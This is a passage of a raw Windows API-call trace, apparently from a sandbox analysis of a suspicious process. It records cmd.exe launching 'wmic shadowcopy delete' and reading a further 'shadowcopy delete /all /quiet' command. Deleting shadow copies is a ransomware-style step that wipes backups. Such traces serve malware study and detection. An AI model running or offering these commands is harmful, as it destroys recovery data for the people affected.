GetProcessHeap () returned 0x27a547e0000 [0137.681] RtlFreeHeap (HeapHandle=0x27a547e0000, Flags=0x0, BaseAddress=0x27a547f9010) returned 1 [0137.681] InitializeProcThreadAttributeList (in: lpAttributeList=0x8dc3d4f070, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x8dc3d4ef60 | out: lpAttributeList=0x8dc3d4f070, lpSize=0x8dc3d4ef60) returned 1 [0137.681] UpdateProcThreadAttribute (in: lpAttributeList=0x8dc3d4f070, dwFlags=0x0, Attribute=0x60001, lpValue=0x8dc3d4ef4c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x8dc3d4f070, lpPreviousValue=0x0) returned 1 [0137.681] GetStartupInfoW (in: lpStartupInfo=0x8dc3d4f000 | out: lpStartupInfo=0x8dc3d4f000*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\WINDOWS\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x101, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x248, hStdOutput=0x254, hStdError=0x254)) [0137.681] GetProcessHeap () returned 0x27a547e0000 [0137.682] RtlAllocateHeap (HeapHandle=0x27a547e0000, Flags=0x8, Size=0x20) returned 0x27a547f9010 [0137.682] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0137.682] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0137.682] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0137.682] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0137.682] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0137.682] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0137.682] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0137.682] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0137.682] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0137.682] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0137.683] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0137.683] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0137.683] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0137.685] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0137.685] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0137.685] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0137.685] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0137.685] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0137.685] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0137.685] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0137.685] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0137.685] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0137.689] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0137.689] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0137.689] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0137.689] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0137.699] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0137.699] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0137.699] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0137.699] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0137.699] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0137.699] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0137.699] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0137.699] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0137.699] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0137.699] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0137.699] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0137.699] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0137.699] GetProcessHeap () returned 0x27a547e0000 [0137.699] RtlFreeHeap (HeapHandle=0x27a547e0000, Flags=0x0, BaseAddress=0x27a547f9010) returned 1 [0137.699] GetProcessHeap () returned 0x27a547e0000 [0137.699] RtlAllocateHeap (HeapHandle=0x27a547e0000, Flags=0x8, Size=0x12) returned 0x27a547f9010 [0137.699] _get_osfhandle (_FileHandle=1) returned 0x254 [0137.699] SetConsoleMode (hConsoleHandle=0x254, dwMode=0x0) returned 0 [0137.699] _get_osfhandle (_FileHandle=0) returned 0x248 [0137.699] SetConsoleMode (hConsoleHandle=0x248, dwMode=0x0) returned 0 [0137.699] CreateProcessW (in: lpApplicationName="C:\\WINDOWS\\System32\\Wbem\\WMIC.exe", lpCommandLine="wmic shadowcopy delete", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\WINDOWS\\system32", lpStartupInfo=0x8dc3d4ef90*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="wmic shadowcopy delete", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x8dc3d4ef68 | out: lpCommandLine="wmic shadowcopy delete", lpProcessInformation=0x8dc3d4ef68*(hProcess=0x94, hThread=0x98, dwProcessId=0xfb0, dwThreadId=0xfb4)) returned 1 [0137.937] CloseHandle (hObject=0x98) returned 1 [0137.937] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0137.937] GetProcessHeap () returned 0x27a547e0000 [0137.938] RtlFreeHeap (HeapHandle=0x27a547e0000, Flags=0x0, BaseAddress=0x27a547fb5c0) returned 1 [0137.938] GetEnvironmentStringsW () returned 0x27a547e5930* [0137.938] GetProcessHeap () returned 0x27a547e0000 [0137.938] RtlAllocateHeap (HeapHandle=0x27a547e0000, Flags=0x8, Size=0xaea) returned 0x27a547faac0 [0137.938] FreeEnvironmentStringsA (penv="=") returned 1 [0137.938] NtQueryInformationProcess (in: ProcessHandle=0x94, ProcessInformationClass=0x0, ProcessInformation=0x8dc3d4e468, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x8dc3d4e468, ReturnLength=0x0) returned 0x0 [0137.938] ReadProcessMemory (in: hProcess=0x94, lpBaseAddress=0x26d5891000, lpBuffer=0x8dc3d4e4a0, nSize=0x7a0, lpNumberOfBytesRead=0x8dc3d4e460 | out: lpBuffer=0x8dc3d4e4a0*, lpNumberOfBytesRead=0x8dc3d4e460*=0x7a0) returned 1 [0137.938] WaitForSingleObject (hHandle=0x94, dwMilliseconds=0xffffffff) returned 0x0 [0149.122] GetExitCodeProcess (in: hProcess=0x94, lpExitCode=0x8dc3d4eee8 | out: lpExitCode=0x8dc3d4eee8*=0x80041014) returned 1 [0149.122] CloseHandle (hObject=0x94) returned 1 [0149.122] _vsnwprintf (in: _Buffer=0x8dc3d4f0b8, _BufferCount=0x13, _Format="%08X", _ArgList=0x8dc3d4eef8 | out: _Buffer="80041014") returned 8 [0149.122] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="80041014") returned 1 [0149.122] GetProcessHeap () returned 0x27a547e0000 [0149.122] RtlFreeHeap (HeapHandle=0x27a547e0000, Flags=0x0, BaseAddress=0x27a547faac0) returned 1 [0149.122] GetEnvironmentStringsW () returned 0x27a547e5930* [0149.123] GetProcessHeap () returned 0x27a547e0000 [0149.123] RtlAllocateHeap (HeapHandle=0x27a547e0000, Flags=0x8, Size=0xaea) returned 0x27a547faac0 [0149.123] FreeEnvironmentStringsA (penv="=") returned 1 [0149.123] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0149.123] GetProcessHeap () returned 0x27a547e0000 [0149.123] RtlFreeHeap (HeapHandle=0x27a547e0000, Flags=0x0, BaseAddress=0x27a547faac0) returned 1 [0149.123] GetEnvironmentStringsW () returned 0x27a547e5930* [0149.123] GetProcessHeap () returned 0x27a547e0000 [0149.123] RtlAllocateHeap (HeapHandle=0x27a547e0000, Flags=0x8, Size=0xaea) returned 0x27a547faac0 [0149.123] FreeEnvironmentStringsA (penv="=") returned 1 [0149.123] GetProcessHeap () returned 0x27a547e0000 [0149.123] RtlFreeHeap (HeapHandle=0x27a547e0000, Flags=0x0, BaseAddress=0x27a547f9010) returned 1 [0149.123] DeleteProcThreadAttributeList (in: lpAttributeList=0x8dc3d4f070 | out: lpAttributeList=0x8dc3d4f070) [0149.123] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\WINDOWS\\system32\\cmd.exe") returned 1 [0149.519] ??_V@YAXPEAX@Z () returned 0x1 [0149.519] _get_osfhandle (_FileHandle=1) returned 0x254 [0149.519] SetConsoleMode (hConsoleHandle=0x254, dwMode=0x0) returned 0 [0149.519] _get_osfhandle (_FileHandle=1) returned 0x254 [0149.519] GetConsoleMode (in: hConsoleHandle=0x254, lpMode=0x7ff6de08fc08 | out: lpMode=0x7ff6de08fc08) returned 0 [0149.519] _get_osfhandle (_FileHandle=0) returned 0x248 [0149.519] GetConsoleMode (in: hConsoleHandle=0x248, lpMode=0x7ff6de08fc0c | out: lpMode=0x7ff6de08fc0c) returned 0 [0149.519] GetConsoleOutputCP () returned 0x1b5 [0150.028] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff6de08fbb0 | out: lpCPInfo=0x7ff6de08fbb0) returned 1 [0150.028] SetThreadUILanguage (LangId=0x0) returned 0x409 [0150.420] GetProcessHeap () returned 0x27a547e0000 [0150.420] RtlFreeHeap (HeapHandle=0x27a547e0000, Flags=0x0, BaseAddress=0x27a547f8f80) returned 1 [0150.420] GetProcessHeap () returned 0x27a547e0000 [0150.420] RtlFreeHeap (HeapHandle=0x27a547e0000, Flags=0x0, BaseAddress=0x27a547f8db0) returned 1 [0150.420] GetProcessHeap () returned 0x27a547e0000 [0150.420] RtlFreeHeap (HeapHandle=0x27a547e0000, Flags=0x0, BaseAddress=0x27a547f8bf0) returned 1 [0150.420] GetProcessHeap () returned 0x27a547e0000 [0150.420] RtlFreeHeap (HeapHandle=0x27a547e0000, Flags=0x0, BaseAddress=0x27a547fc0c0) returned 1 [0150.421] GetProcessHeap () returned 0x27a547e0000 [0150.421] RtlFreeHeap (HeapHandle=0x27a547e0000, Flags=0x0, BaseAddress=0x27a547f8ba0) returned 1 [0150.421] GetProcessHeap () returned 0x27a547e0000 [0150.421] RtlFreeHeap (HeapHandle=0x27a547e0000, Flags=0x0, BaseAddress=0x27a547e8bb0) returned 1 [0150.421] GetProcessHeap () returned 0x27a547e0000 [0150.421] RtlFreeHeap (HeapHandle=0x27a547e0000, Flags=0x0, BaseAddress=0x27a547e6ef0) returned 1 [0150.421] GetProcessHeap () returned 0x27a547e0000 [0150.421] RtlFreeHeap (HeapHandle=0x27a547e0000, Flags=0x0, BaseAddress=0x27a547e6c60) returned 1 [0150.421] GetProcessHeap () returned 0x27a547e0000 [0150.421] RtlFreeHeap (HeapHandle=0x27a547e0000, Flags=0x0, BaseAddress=0x27a547e6e30) returned 1 [0150.421] _vsnwprintf (in: _Buffer=0x7ff6de097f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x8dc3d4f498 | out: _Buffer="\r\n") returned 2 [0150.421] _get_osfhandle (_FileHandle=1) returned 0x254 [0150.421] GetFileType (hFile=0x254) returned 0x3 [0150.421] _get_osfhandle (_FileHandle=1) returned 0x254 [0150.421] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=-1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n", lpUsedDefaultChar=0x0) returned 3 [0150.421] WriteFile (in: hFile=0x254, lpBuffer=0x7ff6de089970*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x8dc3d4f468, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesWritten=0x8dc3d4f468*=0x2, lpOverlapped=0x0) returned 1 [0150.421] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x7ff6de08bb90, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0150.421] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x27a549b0080 | out: lpBuffer="C:\\WINDOWS\\system32") returned 0x13 [0150.421] _vsnwprintf (in: _Buffer=0x27a549c0060, _BufferCount=0x83e5, _Format="%s", _ArgList=0x8dc3d4f4a8 | out: _Buffer="C:\\WINDOWS\\system32") returned 19 [0150.421] _vsnwprintf (in: _Buffer=0x27a549c0086, _BufferCount=0x83d2, _Format="%c", _ArgList=0x8dc3d4f4a8 | out: _Buffer=">") returned 1 [0150.421] _get_osfhandle (_FileHandle=1) returned 0x254 [0150.422] GetFileType (hFile=0x254) returned 0x3 [0150.422] _get_osfhandle (_FileHandle=1) returned 0x254 [0150.422] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="C:\\WINDOWS\\system32>", cchWideChar=-1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\WINDOWS\\system32>", lpUsedDefaultChar=0x0) returned 21 [0150.422] WriteFile (in: hFile=0x254, lpBuffer=0x7ff6de089970*, nNumberOfBytesToWrite=0x14, lpNumberOfBytesWritten=0x8dc3d4f498, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesWritten=0x8dc3d4f498*=0x14, lpOverlapped=0x0) returned 1 [0150.422] _get_osfhandle (_FileHandle=0) returned 0x248 [0150.422] GetFileType (hFile=0x248) returned 0x3 [0150.422] _get_osfhandle (_FileHandle=0) returned 0x248 [0150.422] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.422] ReadFile (in: hFile=0x248, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x8dc3d4f7f8, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x8dc3d4f7f8*=0x1, lpOverlapped=0x0) returned 1 [0150.422] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c30, cchWideChar=1 | out: lpWideCharStr="bmic shadowcopy delete\n /all /quiet\n") returned 1 [0150.422] _get_osfhandle (_FileHandle=0) returned 0x248 [0150.422] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.422] ReadFile (in: hFile=0x248, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x8dc3d4f7f8, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x8dc3d4f7f8*=0x1, lpOverlapped=0x0) returned 1 [0150.422] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c32, cchWideChar=1 | out: lpWideCharStr="cic shadowcopy delete\n /all /quiet\n") returned 1 [0150.422] _get_osfhandle (_FileHandle=0) returned 0x248 [0150.422] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.422] ReadFile (in: hFile=0x248, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x8dc3d4f7f8, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x8dc3d4f7f8*=0x1, lpOverlapped=0x0) returned 1 [0150.422] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c34, cchWideChar=1 | out: lpWideCharStr="dc shadowcopy delete\n /all /quiet\n") returned 1 [0150.422] _get_osfhandle (_FileHandle=0) returned 0x248 [0150.422] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.422] ReadFile (in: hFile=0x248, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x8dc3d4f7f8, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x8dc3d4f7f8*=0x1, lpOverlapped=0x0) returned 1 [0150.422] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c36, cchWideChar=1 | out: lpWideCharStr="e shadowcopy delete\n /all /quiet\n") returned 1 [0150.422] _get_osfhandle (_FileHandle=0) returned 0x248 [0150.422] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.423] ReadFile (in: hFile=0x248, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x8dc3d4f7f8, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x8dc3d4f7f8*=0x1, lpOverlapped=0x0) returned 1 [0150.423] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c38, cchWideChar=1 | out: lpWideCharStr="dshadowcopy delete\n /all /quiet\n") returned 1 [0150.423] _get_osfhandle (_FileHandle=0) returned 0x248 [0150.423] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.423] ReadFile (in: hFile=0x248, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x8dc3d4f7f8, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x8dc3d4f7f8*=0x1, lpOverlapped=0x0) returned 1 [0150.423] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c3a, cchWideChar=1 | out: lpWideCharStr="ihadowcopy delete\n /all /quiet\n") returned 1 [0150.423] _get_osfhandle (_FileHandle=0) returned 0x248 [0150.423] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.423] ReadFile (in: hFile=0x248, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x8dc3d4f7f8, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x8dc3d4f7f8*=0x1, lpOverlapped=0x0) returned 1 [0150.423] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c3c, cchWideChar=1 | out: lpWideCharStr="tadowcopy delete\n /all /quiet\n") returned 1 [0150.423] _get_osfhandle (_FileHandle=0) returned 0x248 [0150.423] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.423] ReadFile (in: hFile=0x248, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x8dc3d4f7f8, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x8dc3d4f7f8*=0x1, lpOverlapped=0x0) returned 1 [0150.423] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c3e, cchWideChar=1 | out: lpWideCharStr=" dowcopy delete\n /all /quiet\n") returned 1 [0150.423] _get_osfhandle (_FileHandle=0) returned 0x248 [0150.423] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.423] ReadFile (in: hFile=0x248, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x8dc3d4f7f8, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x8dc3d4f7f8*=0x1, lpOverlapped=0x0) returned 1 [0150.423] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c40, cchWideChar=1 | out: lpWideCharStr="/owcopy delete\n /all /quiet\n") returned 1 [0150.423] _get_osfhandle (_FileHandle=0) returned 0x248 [0150.423] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.423] ReadFile (in: hFile=0x248, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x8dc3d4f7f8, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x8dc3d4f7f8*=0x1, lpOverlapped=0x0) returned 1 [0150.423] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c42, cchWideChar=1 | out: lpWideCharStr="swcopy delete\n /all /quiet\n") returned 1 [0150.423] _get_osfhandle (_FileHandle=0) returned 0x248 [0150.423] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.423] ReadFile (in: hFile=0x248, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x8dc3d4f7f8, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x8dc3d4f7f8*=0x1, lpOverlapped=0x0) returned 1 [0150.423] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c44, cchWideChar=1 | out: lpWideCharStr="ecopy delete\n /all /quiet\n") returned 1 [0150.423] _get_osfhandle (_FileHandle=0) returned 0x248 [0150.423] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.424] ReadFile (in: hFile=0x248, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x8dc3d4f7f8, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x8dc3d4f7f8*=0x1, lpOverlapped=0x0) returned 1 [0150.424] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c46, cchWideChar=1 | out: lpWideCharStr="topy delete\n /all /quiet\n") returned 1 [0150.424] _get_osfhandle (_FileHandle=0) returned 0x248 [0150.424] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.424] ReadFile (in: hFile=0x248, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x8dc3d4f7f8, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x8dc3d4f7f8*=0x1, lpOverlapped=0x0) returned 1 [0150.424] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c48, cchWideChar=1 | out: lpWideCharStr=" py delete\n /all /quiet\n") returned 1 [0150.424] _get_osfhandle (_FileHandle=0) returned 0x248 [0150.424] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.424] ReadFile (in: hFile=0x248, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x8dc3d4f7f8, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x8dc3d4f7f8*=0x1, lpOverlapped=0x0) returned 1 [0150.424] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c4a, cchWideChar=1 | out: lpWideCharStr="{y delete\n /all /quiet\n") returned 1 [0150.424] _get_osfhandle (_FileHandle=0) returned 0x248 [0150.424] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.424] ReadFile (in: hFile=0x248, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x8dc3d4f7f8, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x8dc3d4f7f8*=0x1, lpOverlapped=0x0) returned 1 [0150.424] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c4c, cchWideChar=1 | out: lpWideCharStr="d delete\n /all /quiet\n") returned 1 [0150.424] _get_osfhandle (_FileHandle=0) returned 0x248 [0150.424] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.424] ReadFile (in: hFile=0x248, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x8dc3d4f7f8, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x8dc3d4f7f8*=0x1, lpOverlapped=0x0) returned 1 [0150.424] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c4e, cchWideChar=1 | out: lpWideCharStr="edelete\n /all /quiet\n") returned 1 [0150.424] _get_osfhandle (_FileHandle=0) returned 0x248 [0150.424] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.424] ReadFile (in: hFile=0x248, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x8dc3d4f7f8, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x8dc3d4f7f8*=0x1, lpOverlapped=0x0) returned 1 [0150.424] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c50, cchWideChar=1 | out: lpWideCharStr="felete\n /all /quiet\n") returned 1 [0150.424] _get_osfhandle (_FileHandle=0) returned 0x248 [0150.424] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, 